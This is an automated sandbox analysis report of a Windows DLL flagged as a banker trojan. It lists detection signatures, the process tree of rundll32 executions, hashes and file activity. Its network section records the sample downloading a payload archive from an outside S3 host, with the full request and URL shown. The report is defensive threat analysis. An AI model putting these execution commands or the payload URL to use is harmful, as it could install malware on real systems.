Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
decrypt-main.dll.dll

Overview

General Information

Sample name:decrypt-main.dll.dll
renamed because original name is a hash value
Original sample name:decrypt-main.dll.exe
Analysis ID:1408464
MD5:1715ba4aa4ff4c70e66943076f3236ac
SHA1:f57bfbe116f915e5525c5eff36b5eb5969282171
SHA256:faebf87c3ff1345bbd5910fe4633b2b49dc83fe62b400ecaa102594d5edb39f0
Tags:bankerexetrojan
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 64 cmdline: loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4996 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 948 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 5208 cmdline: C:\Windows\system32\WerFault.exe -u -p 948 -s 484 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 1756 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 1436 cmdline: C:\Windows\system32\WerFault.exe -u -p 1756 -s 2000 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 5932 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4072 cmdline: rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 5608 cmdline: C:\Windows\system32\WerFault.exe -u -p 4072 -s 468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 1968 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1320 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7028 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 572 cmdline: C:\Windows\system32\WerFault.exe -u -p 7028 -s 468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 6040 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: decrypt-main.dll.dllReversingLabs: Detection: 44%
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
Source: unknownHTTPS traffic detected: 52.95.163.36:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00415080 FindFirstFileW,FindClose,5_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 5_1_00415080 FindFirstFileW,5_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 6_1_00415080 FindFirstFileW,6_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00415080 FindFirstFileW,FindClose,14_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00415080 FindFirstFileW,FindClose,18_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00415080 FindFirstFileW,FindClose,19_2_00415080
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_b9ef1030-2491-4365-a391-35e17ec755ab\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_07fe291b-769a-411f-9cce-c267542d2e67\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 52.95.163.36 443Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /bucketPc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00815B40 Sleep,SleepEx,URLDownloadToFileW,Sleep,5_2_00815B40
Source: global trafficHTTP traffic detected: GET /bucketPc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: KGMPNF9Q2A4G276Ax-amz-id-2: oUwOBGcXcRaJOfg9RDvUMM390Opwe1X0G+WIoo1w9G6BKuiw2Othw5sAOuPb4cT9/PXSnCglEcE=Content-Type: application/xmlTransfer-Encoding: chunkedDate: Wed, 13 Mar 2024 16:01:21 GMTServer: AmazonS3Connection: close
Source: rundll32.exe, 00000005.00000003.2205682217.000001FA1F332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000014.00000002.2596173277.0000000000428000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000015.00000002.2277081579.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dllString found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/2
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip)c
Source: rundll32.exe, 00000005.00000002.2533961841.000001FA1D38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 52.95.163.36:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00414B505_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 5_2_004382205_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00414B5014_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0043822014_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00414B5018_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0043822018_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00414B5019_2_00414B50
Source: C:\Windows\System32\rundll32.exeCode function: 19_2_0043822019_2_00438220
Source: C:\Windows\System32\rundll32.exeCode function: String function: 004208C0 appears 96 times
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 948 -s 484
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: classification engineClassification label: mal56.evad.winDLL@26/17@1/1
Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4072
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1756
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7028
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess948
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0d6c8920-a6c5-4adf-abdf-9453bbcaf51aJump to behavior
Source: decrypt-main.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Source: decrypt-main.dll.dllReversingLabs: Detection: 44%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 948 -s 484
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1756 -s 2000
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4072 -s 468
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7028 -s 468
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheckJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheckJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMainJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddrJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapperJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
Source: decrypt-main.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: decrypt-main.dll.dllStatic file information: File size 5330944 > 1048576
Source: decrypt-main.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x424000
Source: decrypt-main.dll.dllStatic PE information: section name: .didata
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
